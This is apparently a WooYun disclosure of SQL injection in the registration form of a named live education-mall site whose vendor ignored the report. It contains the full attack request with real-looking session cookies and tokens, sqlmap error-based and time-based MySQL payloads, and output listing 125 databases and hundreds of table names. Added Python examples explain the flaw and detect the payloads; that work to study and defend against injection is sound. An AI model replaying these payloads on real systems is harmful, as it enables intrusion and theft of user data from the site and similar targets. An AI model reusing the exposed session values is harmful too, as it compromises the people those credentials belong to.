
Vulnerability Summary (24 followers)

Defect ID: wooyun-2015-0139036

Title: SQL injection on a 好老师联盟 site

Vendor: hlslm.cn

Author: 路人甲

Submitted: 2015-09-06 08:27

Fix time: 2015-09-11 08:28

Published: 2015-09-11 08:28

Type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Vendor notified, but the vendor ignored the vulnerability

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:


Vulnerability Details

Disclosure status:

2015-09-06: Details sent to the vendor; awaiting the vendor's handling
2015-09-11: Vendor actively ignored the vulnerability; details made public

Brief description: (none provided)

Detailed description:

http://mall.jzq001.com/

POST /member.php?mod=zhuce HTTP/1.1
Content-Length: 1186
Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_WNUJNQQGMX
Cookie: DVDd_1c73_saltkey=kGHcH4G4; DVDd_1c73_lastvisit=1441363214; DVDd_1c73_sid=ln2lZl; DVDd_1c73_lastact=1441366829%09plugin.php%09; DVDd_1c73_IS_CITYSITE=1; DVDd_1c73_cityname=%E5%85%A8%E5%9B%BD; DVDd_1c73_cityname_en=www; DVDd_1c73_con_request_token=2298710468495038928; DVDd_1c73_con_request_token_secret=IhqcQrusQAUXJHHq; DVDd_1c73_virtualid=99d2ccc88e5cdd4df5bf6962fd0fc661; DVDd_1c73_visitedfid=254D231D235; DVDd_1c73_viewid=tid_34745; DVDd_1c73_sendmail=1; DVDd_1c73_onlineusernum=90; DVDd_1c73_connect_not_sync_t=1; DVDd_1c73__refer=%252Fhome.php%253Fac%253Dshare%2526id%253D34745%2526mod%253Dspacecp%2526type%253Dthread; recom=1; DVDd_1c73_clientinfo=false; DVDd_1c73_download=201509041896; DVDd_1c73_goods=a%3A1%3A%7Bi%3A1896%3Ba%3A7%3A%7Bs%3A6%3A%22itemid%22%3Bs%3A4%3A%221896%22%3Bs%3A5%3A%22price%22%3Bs%3A2%3A%2235%22%3Bs%3A8%3A%22vipprice%22%3Bs%3A2%3A%2225%22%3Bs%3A9%3A%22pricetype%22%3Bs%3A1%3A%220%22%3Bs%3A7%3A%22viptype%22%3Bs%3A1%3A%221%22%3Bs%3A5%3A%22thumb%22%3Bs%3A51%3A%22source%2Fplugin%2Fmall%2Fpublic%2Fupload%2Fimg%2F1422407894.jpg%22%3Bs%3A5%3A%22title%22%3Bs%3A61%3A%22%E3%80%90%E8%8B%8F%E6%95%99%E7%89%9B%E6%B4%A5%E7%89%88%E3%80%91%E4%B8%89%E5%B9%B4%E7%BA%A7%E8%8B%B1%E8%AF%AD%E4%B8%8A%E5%86%8C%E6%9C%9F%E6%9C%AB%E8%AF%95%E9%A2%98%2814%E4%BB%BD%29%22%3B%7D%7D; DVDd_1c73_shoping=b%3A0%3B
Host: mall.jzq001.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="regsubmit"
true
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="activationauth"
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="formhash"
7d375400
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="mobile"
1*
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="passwordQIUXUE"
g00dPa$$w0rD
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="referer"
http://mall.jzq001.com/
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="regsubmit"
yes
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="regtype"
1
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="verifycode"
g00dPa$$w0rD
-------AcunetixBoundary_WNUJNQQGMX--

The injection point is the mobile parameter. Both payloads sqlmap found have the same shape: the value starts with 1' to close the single-quoted literal the mobile value is placed in, appends an injected condition, and ends with AND 'x'='x so the statement still parses, which shows the field reaches the query unescaped. The error-based payload uses the MySQL FLOOR(RAND(0)*2) GROUP BY trick: RAND(0) yields a fixed sequence that produces a duplicate group key, and the resulting "Duplicate entry" error echoes that key, i.e. the CONCAT() value wrapped in the marker strings 0x716a6a7071 ('qjjpq') and 0x7176706b71 ('qvpkq'). The time-based payload instead delays the response with SLEEP(5) when the condition holds.
125 databases are accessible:

[screenshot: 2.jpg]
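To make the mechanism behind these payloads concrete, here is an added example; it is not the site's code, which the report does not show. It models a hypothetical "is this mobile already registered?" lookup behind the registration form, once with the value concatenated into the query and once with a bound parameter, and shows the boolean oracle a blind-injection tool reads from the first form. It runs on an in-memory SQLite database instead of MySQL, so the report's MySQL-specific SLEEP()/RAND(0) payloads are replaced with a true/false pair of the same quote-closing shape; the table, column names and sample rows are assumptions.

```python
import sqlite3

# Constructed sample rows; the site's real schema is not known from the report.
SAMPLE_MEMBERS = [("13800000001", "alice"), ("13800000002", "bob")]


def make_db():
    """In-memory stand-in for the registration database (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE member (uid INTEGER PRIMARY KEY, mobile TEXT, username TEXT)")
    conn.executemany("INSERT INTO member (mobile, username) VALUES (?, ?)", SAMPLE_MEMBERS)
    conn.commit()
    return conn


def count_by_mobile_vulnerable(conn, mobile):
    """Hypothetical lookup with the value pasted into the quoted literal,
    the pattern the report's payloads imply: a quote in the value closes
    the string and everything after it is parsed as SQL."""
    sql = "SELECT COUNT(*) FROM member WHERE mobile = '%s'" % mobile
    return conn.execute(sql).fetchone()[0]


def count_by_mobile_safe(conn, mobile):
    """Same lookup with a bound parameter: the driver transmits the value
    separately from the statement, so quotes and keywords in it stay data."""
    sql = "SELECT COUNT(*) FROM member WHERE mobile = ?"
    return conn.execute(sql, (mobile,)).fetchone()[0]


# Same shape as the report's payloads: close the quote, add a condition,
# rebalance with AND 'x'='x so the statement still parses.
TRUE_PAYLOAD = "13800000001' AND 1=1 AND 'a'='a"
FALSE_PAYLOAD = "13800000001' AND 1=2 AND 'a'='a"


def blind_signal(lookup, conn):
    """Return (result for a true condition, result for a false condition).
    A difference between the two is the oracle a blind-injection tool such as
    sqlmap uses to read data one bit at a time. The safe lookup answers the
    same for both, because no row has either whole string as its mobile."""
    return lookup(conn, TRUE_PAYLOAD), lookup(conn, FALSE_PAYLOAD)


if __name__ == "__main__":
    db = make_db()
    print("concatenated:", blind_signal(count_by_mobile_vulnerable, db))  # (1, 0)
    print("parameterized:", blind_signal(count_by_mobile_safe, db))       # (0, 0)
```

The (1, 0) versus (0, 0) difference is the whole vulnerability: once the application's answer depends on an attacker-chosen SQL condition, sqlmap can substitute any subquery for the condition, which is how it enumerated the 125 databases below.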

Proof of vulnerability:

sqlmap identified the following injection point(s) with a total of 72 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: -------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="regsubmit"
true
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="activationauth"
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="formhash"
7d375400
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="mobile"
1' AND (SELECT 1766 FROM(SELECT COUNT(*),CONCAT(0x716a6a7071,(SELECT (ELT(1766=1766,1))),0x7176706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Zvuv'='Zvuv
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="passwordQIUXUE"
g00dPa$$w0rD
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="referer"
http://mall.jzq001.com/
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="regsubmit"
yes
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="regtype"
1
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="verifycode"
g00dPa$$w0rD
-------AcunetixBoundary_WNUJNQQGMX--
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: -------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="regsubmit"
true
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="activationauth"
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="formhash"
7d375400
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="mobile"
1' AND (SELECT * FROM (SELECT(SLEEP(5)))dFeV) AND 'syGU'='syGU
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="passwordQIUXUE"
g00dPa$$w0rD
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="referer"
http://mall.jzq001.com/
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="regsubmit"
yes
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="regtype"
1
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="verifycode"
g00dPa$$w0rD
-------AcunetixBoundary_WNUJNQQGMX--
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.5.22, Apache 2.2.15
back-end DBMS: MySQL 5.0
available databases [125]:
[*] 021gaokao.com
[*] 16qianjin_2013
[*] 16qianjin_2013_2
[*] 21edu
[*] 21edu1
[*] 21edu2
[*] 21eedu
[*] 51qiuxue
[*] 52eedu
[*] 52qiuxue
[*] backup
[*] bbs_52qiuxue
[*] bbs_52qiuxue20150805
[*] bbs_52qiuxue_20150703
[*] bbs_52qiuxue_20150804
[*] bbs_52qiuxue_backup20150703
[*] bfdly.com
[*] bfdly.com_new
[*] bfdly_com
[*] ceqiuxue
[*] dedecmsv57utf8sp1
[*] destoon
[*] efyingyu.com
[*] gt.52qiuxue.com
[*] hangjinxue
[*] hdm0360223_db
[*] htlx.iacliuxue.net_new
[*] huatong.cliuxue.net
[*] huatong.iacliuxue.org
[*] huatongbefoundfcom
[*] huatongbefoundfcombak
[*] huatongbefoundfcombbak
[*] ihuatong.com
[*] information_schema
[*] jh.ydyjiajiao.org
[*] jinghan.zhilife.net
[*] jinghantj.com
[*] jingrui
[*] jingrui1v1.com
[*] jr.ydyfudao.com
[*] jztjy.cn
[*] luntan
[*] luntantest1011
[*] maisiling
[*] moban_huatong
[*] my021gaokao
[*] my97today
[*] mybtxueda
[*] mycdxueda
[*] mycqxueda
[*] myczxueda
[*] mydg-seiko
[*] mydgxueda
[*] mydlxueda
[*] myfsxueda
[*] myhhhtxueda
[*] myhuizxueda
[*] mymupingwang
[*] myncxueda
[*] mynjlvying
[*] mynnxueda
[*] myshjingh
[*] mysql
[*] mysql_log
[*] mysuzxueda
[*] mytyxueda
[*] mywinnetcap
[*] mywzxueda
[*] myxmxueda
[*] myxuedacs
[*] myxyxueda
[*] myytxueda
[*] nice
[*] njlvying.com
[*] novel
[*] phpcms
[*] ppc
[*] ppcall.befound.cn
[*] qdxueda.cn
[*] qiaowai
[*] qwiacliuxuenet
[*] ruisiyingyu.com
[*] sq_sinobm
[*] sunmax
[*] sunmaxtest
[*] szjuzhitang.com
[*] ultrax
[*] vip.befound.cn
[*] vzmer00376
[*] www.1v1buxi.net
[*] www.1v1buxi.org/huatong
[*] www.1v1buxi.org/zhongqing
[*] www.aicansi.com
[*] www.aicansi.com/huatong
[*] www.bf1v1.org
[*] www.bfdeu.com/zhongqing
[*] www.bfdeu.com/zhongqing2
[*] www.bliuxue.net
[*] www.cpbo.cn/huatong
[*] www.k12-edu.org/zhongqing
[*] www.libro.cn/huatong
[*] www.mupingwang.com
[*] www.qzj999.com/zhongqing
[*] www.sdfyme.com/huatong
[*] www.tzun.cn/zhongqing
[*] www.ydy114.org/huatong
[*] www_51fudao_org_xxq
[*] wwwchuguoyiminnet_qw
[*] wwwcnadicn_qw
[*] wwwedubuxnet
[*] wwwedupeixcom
[*] wwwedupeixcombak
[*] wwwgexingfudaonetjinghan
[*] wwwivcdcn_qiaowai
[*] wwwpcfmcn_qiaowai
[*] wwwssjzhcom_qiaowai
[*] xajuzhitang.com
[*] yuejiliuxue.com
[*] yzm_usercenter
[*] zgjhjy.zhilife.net
[*] zhishenghuo.org
[*] zjht.befoundg.com
[*] zjht.befoundg.com.bak
[*] zqsa
[*] zt00p1_db

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
(same error-based and time-based payloads as listed above)
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.5.22, Apache 2.2.15
back-end DBMS: MySQL 5.0
Database: bbs_52qiuxue
[467 tables]
+----------------------------------+
| group |
| user |
| access |
| active_active_zh |
| active_changeusername |
| active_city_website_hooks |
| active_city_website_push_log |
| active_city_website_setting |
| active_lottery_chance_zh |
| active_lottery_line_zh |
| active_lottery_zh |
| active_questionnaire |
| active_questionnaire_users |
| active_share_qq_log |
| amy_user_setting |
| appbyme_config |
| appbyme_portal_module |
| appbyme_portal_module_source |
| appbyme_user_setting |
| article |
| baidusubmit_setting |
| baidusubmit_sitemap |
| baidusubmit_urlstat |
| class |
| common_admincp_cmenu |
| common_admincp_group |
| common_admincp_member |
| common_admincp_perm |
| common_admincp_session |
| common_admingroup |
| common_adminnote |
| common_advertisement |
| common_advertisement_custom |
| common_banned |
| common_block |
| common_block_favorite |
| common_block_item |
| common_block_item_data |
| common_block_permission |
| common_block_pic |
| common_block_style |
| common_block_xml |
| common_cache |
| common_card |
| common_card_log |
| common_card_type |
| common_connect_guest |
| common_credit_log |
| common_credit_log_field |
| common_credit_rule |
| common_credit_rule_log |
| common_credit_rule_log_field |
| common_cron |
| common_devicetoken |
| common_district |
| common_diy_data |
| common_domain |
| common_failedip |
| common_failedlogin |
| common_friendlink |
| common_grouppm |
| common_invite |
| common_magic |
| common_magiclog |
| common_mailcron |
| common_mailqueue |
| common_member |
| common_member_action_log |
| common_member_connect |
| common_member_count |
| common_member_crime |
| common_member_field_forum |
| common_member_field_home |
| common_member_forum_buylog |
| common_member_grouppm |
| common_member_log |
| common_member_magic |
| common_member_medal |
| common_member_newprompt |
| common_member_profile |
| common_member_profile_bak |
| common_member_profile_setting |
| common_member_security |
| common_member_secwhite |
| common_member_stat_field |
| common_member_status |
| common_member_validate |
| common_member_verify |
| common_member_verify_info |
| common_member_wechat |
| common_member_wechatmp |
| common_myapp |
| common_myinvite |
| common_mytask |
| common_nav |
| common_onlinetime |
| common_optimizer |
| common_patch |
| common_plugin |
| common_plugin_aliyunrec |
| common_plugin_luckypacket |
| common_plugin_luckypacketlog |
| common_pluginvar |
| common_process |
| common_regip |
| common_relatedlink |
| common_remote_port |
| common_report |
| common_searchindex |
| common_seccheck |
| common_secquestion |
| common_session |
| common_setting |
| common_setting2 |
| common_setting_150805 |
| common_setting_150807 |
| common_smiley |
| common_sphinxcounter |
| common_stat |
| common_statuser |
| common_style |
| common_stylevar |
| common_syscache |
| common_tag |
| common_tagitem |
| common_task |
| common_taskvar |
| common_template |
| common_template_block |
| common_template_permission |
| common_uin_black |
| common_usergroup |
| common_usergroup_field |
| common_verifycode |
| common_visit |
| common_word |
| common_word_type |
| connect_disktask |
| connect_feedlog |
| connect_memberbindlog |
| connect_postfeedlog |
| connect_tthreadlog |
| dsu_paulsign |
| dsu_paulsignemot |
| dsu_paulsignset |
| form |
| forum_access |
| forum_activity |
| forum_activityapply |
| forum_announcement |
| forum_attachment |
| forum_attachment_0 |
| forum_attachment_1 |
| forum_attachment_2 |
| forum_attachment_3 |
| forum_attachment_4 |
| forum_attachment_5 |
| forum_attachment_6 |
| forum_attachment_7 |
| forum_attachment_8 |
| forum_attachment_9 |
| forum_attachment_exif |
| forum_attachment_unused |
| forum_attachtype |
| forum_bbcode |
| forum_collection |
| forum_collectioncomment |
| forum_collectionfollow |
| forum_collectioninvite |
| forum_collectionrelated |
| forum_collectionteamworker |
| forum_collectionthread |
| forum_creditslog |
| forum_debate |
| forum_debatepost |
| forum_faq |
| forum_filter_post |
| forum_forum |
| forum_forum_threadtable |
| forum_forumfield |
| forum_forumrecommend |
| forum_groupcreditslog |
| forum_groupfield |
| forum_groupinvite |
| forum_grouplevel |
| forum_groupuser |
| forum_hotreply_member |
| forum_hotreply_number |
| forum_imagetype |
| forum_medal |
| forum_medallog |
| forum_memberrecommend |
| forum_moderator |
| forum_modwork |
| forum_newthread |
| forum_onlinelist |
| forum_order |
| forum_pinggu |
| forum_poll |
| forum_polloption |
| forum_polloption_image |
| forum_pollvoter |
| forum_post |
| forum_post_location |
| forum_post_moderate |
| forum_post_tableid |
| forum_postcache |
| forum_postcomment |
| forum_postlog |
| forum_poststick |
| forum_promotion |
| forum_ratelog |
| forum_relatedthread |
| forum_replycredit |
| forum_rsscache |
| forum_sofa |
| forum_spacecache |
| forum_statlog |
| forum_thread |
| forum_thread_moderate |
| forum_threadaddviews |
| forum_threadcalendar |
| forum_threadclass |
| forum_threadclosed |
| forum_threaddisablepos |
| forum_threadhidelog |
| forum_threadhot |
| forum_threadimage |
| forum_threadlog |
| forum_threadmod |
| forum_threadpartake |
| forum_threadpreview |
| forum_threadprofile |
| forum_threadprofile_group |
| forum_threadrush |
| forum_threadtype |
| forum_trade |
| forum_tradecomment |
| forum_tradelog |
| forum_typeoption |
| forum_typeoptionvar |
| forum_typevar |
| forum_warning |
| group_class |
| group_class_user |
| home_access |
| home_album |
| home_album_category |
| home_appcreditlog |
| home_blacklist |
| home_blog |
| home_blog_category |
| home_blog_moderate |
| home_blogfield |
| home_class |
| home_click |
| home_clickuser |
| home_comment |
| home_comment_moderate |
| home_docomment |
| home_doing |
| home_doing_moderate |
| home_favorite |
| home_feed |
| home_feed_app |
| home_follow |
| home_follow_feed |
| home_follow_feed_archiver |
| home_friend |
| home_friend_request |
| home_friendlog |
| home_notification |
| home_pic |
| home_pic_moderate |
| home_picfield |
| home_poke |
| home_pokearchive |
| home_share |
| home_share_moderate |
| home_show |
| home_specialuser |
| home_surrounding_user |
| home_userapp |
| home_userappfield |
| home_visitor |
| lev_login_auth_user |
| lev_open_auth_user |
| lev_open_login_user |
| log |
| mall_address |
| mall_advertsion |
| mall_advertsionswf |
| mall_down_15 |
| mall_down_data_15 |
| mall_favorite |
| mall_fields |
| mall_list |
| mall_order |
| mall_relation |
| mall_shopping |
| mall_withdata |
| mobile_setting |
| mobile_wechat_authcode |
| mobile_wechat_masssend |
| mobile_wechat_resource |
| mobile_wsq_threadlist |
| moodwall |
| myrepeats |
| node |
| node_operation |
| plugin_admincp_per |
| plugin_auction |
| plugin_auction_message |
| plugin_auction_xml |
| plugin_auctionapply |
| plugin_blessing |
| plugin_formmanage_formlist |
| portal_article_content |
| portal_article_count |
| portal_article_moderate |
| portal_article_related |
| portal_article_title |
| portal_article_trash |
| portal_attachment |
| portal_category |
| portal_category_permission |
| portal_comment |
| portal_comment_moderate |
| portal_rsscache |
| portal_topic |
| portal_topic_pic |
| resource_auth_group |
| resource_auth_group_user |
| role |
| role_user |
| role_user_copy |
| security_evilpost |
| security_eviluser |
| security_failedlog |
| sms_recv |
| sms_send |
| teacher_admin_log |
| teacher_area |
| teacher_artice |
| teacher_article |
| teacher_auditiondata |
| teacher_auditionlog |
| teacher_auth_base |
| teacher_auth_class |
| teacher_auth_courses |
| teacher_auth_experience |
| teacher_auth_index |
| teacher_auth_info |
| teacher_auth_log |
| teacher_auth_success_case |
| teacher_china |
| teacher_collect |
| teacher_comment |
| teacher_commission_log |
| teacher_consumption |
| teacher_course_1 |
| teacher_course_register |
| teacher_course_time_1 |
| teacher_course_type_1 |
| teacher_courses |
| teacher_courses_copy |
| teacher_customer_call_log |
| teacher_detail |
| teacher_experience |
| teacher_fund_log |
| teacher_main |
| teacher_member_bak |
| teacher_member_profile_bak |
| teacher_message_reminder |
| teacher_need |
| teacher_need_accept |
| teacher_need_copy |
| teacher_need_log |
| teacher_need_order_detaill |
| teacher_need_status |
| teacher_order |
| teacher_order_copy |
| teacher_parm |
| teacher_pay_log |
| teacher_points |
| teacher_proportion_rules |
| teacher_propotion_isopen |
| teacher_qrcode |
| teacher_qrcode_group |
| teacher_resources_manage |
| teacher_send_sms_log |
| teacher_sign |
| teacher_sign_log |
| teacher_student_base |
| teacher_student_class_feedback |
| teacher_student_contact |
| teacher_student_sign_feedback |
| teacher_success_case |
| teacher_teacher_base |
| teacher_teacher_comment |
| teacher_teacher_extend |
| teacher_teacher_inside_comment |
| teacher_tp_admin_log |
| teacher_tp_appointment |
| teacher_tp_appointment_copy |
| teacher_tp_area |
| teacher_tp_index |
| teacher_tp_pay_log |
| teacher_tp_type |
| teacher_tp_user_comments |
| teacher_tp_user_false_data |
| teacher_tp_user_false_parm |
| teacher_tp_user_feedback |
| teacher_umemberfields_bak |
| teacher_umembers_bak |
| teacher_user_comment |
| teacher_wechat_audition_send_log |
| teacher_wechat_send_log |
| teacher_wrong_log |
| teacher_wxvote |
| teacher_wxvote_people |
| teachers_teachers_extends |
| ucenter_admins |
| ucenter_amy_pm_heart |
| ucenter_applications |
| ucenter_badwords |
| ucenter_domains |
| ucenter_failedlogins |
| ucenter_feeds |
| ucenter_friends |
| ucenter_mailqueue |
| ucenter_memberfields |
| ucenter_members |
| ucenter_members_150813 |
| ucenter_members_copy |
| ucenter_members_copy1 |
| ucenter_mergemembers |
| ucenter_newpm |
| ucenter_notelist |
| ucenter_pm_indexes |
| ucenter_pm_lists |
| ucenter_pm_members |
| ucenter_pm_messages_0 |
| ucenter_pm_messages_1 |
| ucenter_pm_messages_2 |
| ucenter_pm_messages_3 |
| ucenter_pm_messages_4 |
| ucenter_pm_messages_5 |
| ucenter_pm_messages_6 |
| ucenter_pm_messages_7 |
| ucenter_pm_messages_8 |
| ucenter_pm_messages_9 |
| ucenter_protectedmembers |
| ucenter_settings |
| ucenter_sqlcache |
| ucenter_tags |
| ucenter_vars |
| wechat_log |
| weixin_binding |
| weixin_dy_back |
| weixin_dy_log |
| weixin_http_log |
| weixin_log |
| weixin_parm |
| weixin_push |
| weixin_qiye_log |
| will_log |
+----------------------------------+
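Since the vendor ignored the report, the request above is also useful on the defensive side. The following added example (not from the report, the site, or sqlmap) parses a multipart/form-data body like the one sqlmap sent and flags form fields whose values carry the signatures of the two payloads shown: a closing quote rebalanced with AND 'x'='x, SLEEP(), FLOOR(RAND(0)...) and an INFORMATION_SCHEMA probe. The sample bodies are constructed here from the page's request and its boundary string; the benign variant, with an ordinary phone number in mobile, is an assumption.

```python
import re

# Boundary string from the report's Content-Type header.
BOUNDARY = "-----AcunetixBoundary_WNUJNQQGMX"

# Field list from the report's request (regsubmit is sent twice there as well).
REPORTED_FIELDS = [
    ("regsubmit", "true"),
    ("activationauth", ""),
    ("formhash", "7d375400"),
    ("mobile", "1' AND (SELECT * FROM (SELECT(SLEEP(5)))dFeV) AND 'syGU'='syGU"),
    ("passwordQIUXUE", "g00dPa$$w0rD"),
    ("referer", "http://mall.jzq001.com/"),
    ("regsubmit", "yes"),
    ("regtype", "1"),
    ("verifycode", "g00dPa$$w0rD"),
]
# Constructed benign counterpart: the same form with a plain phone number.
BENIGN_FIELDS = [(n, "13800000001" if n == "mobile" else v) for n, v in REPORTED_FIELDS]

# The report's error-based payload, for scanning on its own.
ERROR_BASED_PAYLOAD = ("1' AND (SELECT 1766 FROM(SELECT COUNT(*),CONCAT(0x716a6a7071,"
                       "(SELECT (ELT(1766=1766,1))),0x7176706b71,FLOOR(RAND(0)*2))x "
                       "FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Zvuv'='Zvuv")


def build_body(fields, boundary=BOUNDARY):
    """Assemble a multipart/form-data body (constructed input for the scanner)."""
    parts = ['--%s\r\nContent-Disposition: form-data; name="%s"\r\n\r\n%s\r\n'
             % (boundary, name, value) for name, value in fields]
    return "".join(parts) + "--%s--\r\n" % boundary


def parse_multipart(body, boundary):
    """Return {field_name: value} for a multipart/form-data body.
    A repeated name keeps the last value, as PHP's $_POST does; a part with
    no value line (activationauth above) yields an empty string."""
    fields = {}
    for part in body.split("--" + boundary):
        part = part.strip("\r\n")
        if not part or part == "--":          # preamble / closing delimiter
            continue
        head, _, value = part.partition("\r\n\r\n")
        match = re.search(r'name="([^"]+)"', head)
        if match:
            fields[match.group(1)] = value.strip("\r\n")
    return fields


# Signatures derived from the two payloads sqlmap reported; the first is the
# quote-rebalancing tail both of them share.
SIGNATURES = [
    ("quote-rebalance", re.compile(r"\bAND\s+'\w+'\s*=\s*'\w+$", re.I)),
    ("time-based",      re.compile(r"\bSLEEP\s*\(", re.I)),
    ("error-based",     re.compile(r"\bFLOOR\s*\(\s*RAND\s*\(\s*0\s*\)", re.I)),
    ("schema-probe",    re.compile(r"\bINFORMATION_SCHEMA\.", re.I)),
]


def scan_fields(fields):
    """Return {field_name: [matched signature labels]} for suspicious fields only."""
    hits = {}
    for name, value in fields.items():
        labels = [label for label, rx in SIGNATURES if rx.search(value)]
        if labels:
            hits[name] = labels
    return hits


def scan_body(body, boundary=BOUNDARY):
    """Parse a raw body and scan every field in one step."""
    return scan_fields(parse_multipart(body, boundary))


if __name__ == "__main__":
    print(scan_body(build_body(REPORTED_FIELDS)))  # {'mobile': ['quote-rebalance', 'time-based']}
    print(scan_body(build_body(BENIGN_FIELDS)))    # {}
```

Signature matching of this kind is a detection aid, not a fix: sqlmap has tamper scripts that rewrite exactly these tokens, so the parameter binding shown earlier remains the control that actually closes the hole.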

Remediation: (none provided)

Copyright notice: when reposting, credit the source: 路人甲@乌云


Vulnerability Response

Vendor response:

Severity: No impact (vendor ignored the report)

Ignored at: 2015-09-11 08:28

Vendor reply:

Vulnerability Rank: 4 (WooYun assessment)

Latest status:

None yet